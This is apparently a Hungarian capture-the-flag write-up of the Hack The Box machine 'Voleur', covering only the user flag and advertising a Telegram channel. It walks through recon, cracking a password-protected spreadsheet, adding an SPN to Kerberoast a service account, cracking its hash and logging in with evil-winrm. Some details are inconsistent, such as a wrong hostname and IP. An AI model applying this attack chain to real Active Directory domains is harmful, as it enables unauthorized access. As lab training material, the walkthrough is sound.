Skip to content

Voleur - Hack The Box

Platform: Windows

IP: 10.129.29.242

Difficulty: Medium

Author: NoSec

🚨 Kövess élőben HTB-n — leakek, dropok és mély writeupok
👉 t.me/nosecpwn
Ne olvasd. Csatlakozz.

Recon

nmap -sV -sC -Pn 10.129.29.242

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 10:16 CEST
Nmap scan report for 10.129.29.242
Host is up (0.063s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 16:16:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2222/tcp open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Kapunk alapból egy felhasználó-jelszó párost a géphez:

ryan.naylor / HollowOct31Nyt

Hosts fájl szerkesztése:

sudo nano /etc/hosts
10.129.29.242       voleur.htb dc.voleur.htb

Idő szinkron fontos:

sudo rdate -n RUSTYKEY.HTB

Kerberos

krb5.conf beállítás:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    VOLEUR.HTB = {
        kdc = 10.129.29.242
        admin_server = 10.129.29.242
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Kerberos ticket szerzés (TGT):

kinit ryan.naylor@VOLEUR.HTB

Kerberosos SMB kapcsolódás Impackettel:

export KRB5CCNAME=ryan.ccache
smbclient.py -k -no-pass -dc-ip 10.129.180.134 VOLEUR.HTB/ryan.naylor@dc.voleur.htb

Belépünk az IT-ba és letöltjük az Access_Review.xlsx fájlt:

get Acces_Review.xlsx

Fájl feltörése (office2john + john):

office2john Access_Review.xlsx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Törött jelszó:

fo<passw>

Tartalom dekódolása:

pip install msoffcrypto-tool
msoffcrypto-tool Access_Review.xlsx decrypted.xlsx -p fo<pass>
xlsx2csv decrypted.xlsx access.csv
cat access.csv

Fájl tartalom

User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!


Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - [REDACTED]
svc_iis,,IIS Administration,P/W - [REDACTED]
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.

Létrehozunk egy SPN-t az svc_winrm accounthoz:

cat > addspn.ldif << 'EOF'
dn: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: HTTP/voleur.htb
EOF

ldapmodify -x   -H ldap://10.129.29.242   -D "svc_ldap@voleur.htb"   -w "M1X<pass>"   -f addspn.ldif

Ezután kiszedjük és feltörjük a hasht:

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py   -k -request -request-user svc_winrm   -dc-ip 10.129.29.242   -dc-host dc.voleur.htb   voleur.htb/svc_ldap > tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFire<pass> (?)     
1g 0:00:00:05 DONE (2025-07-06 21:12) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AHANACK6978012..ADDRESS1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Feltört jelszó:

AFire<pass>

TGT mentés és exportálás:

impacket-getTGT 'VOLEUR.HTB/SVC_WINRM:AFire<pass>'
export KRB5CCNAME=SVC_WINRM.ccache

Belépés evil-winrm-en és User flag megszerzése:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\svc_winrm> cd Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ls


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025  10:33 AM             34 user.txt

User flag megszerezve!

🔐 A root rész csak a privát Telegram csoportban érhető el, amíg a gép aktív a Season 8-ban.
👉 Csatlakozz a teljes writeupért, extra tippekért és belsős tartalmakért:
📡 https://t.me/nosecpwn

© 2025 NoSec. All rights reserved.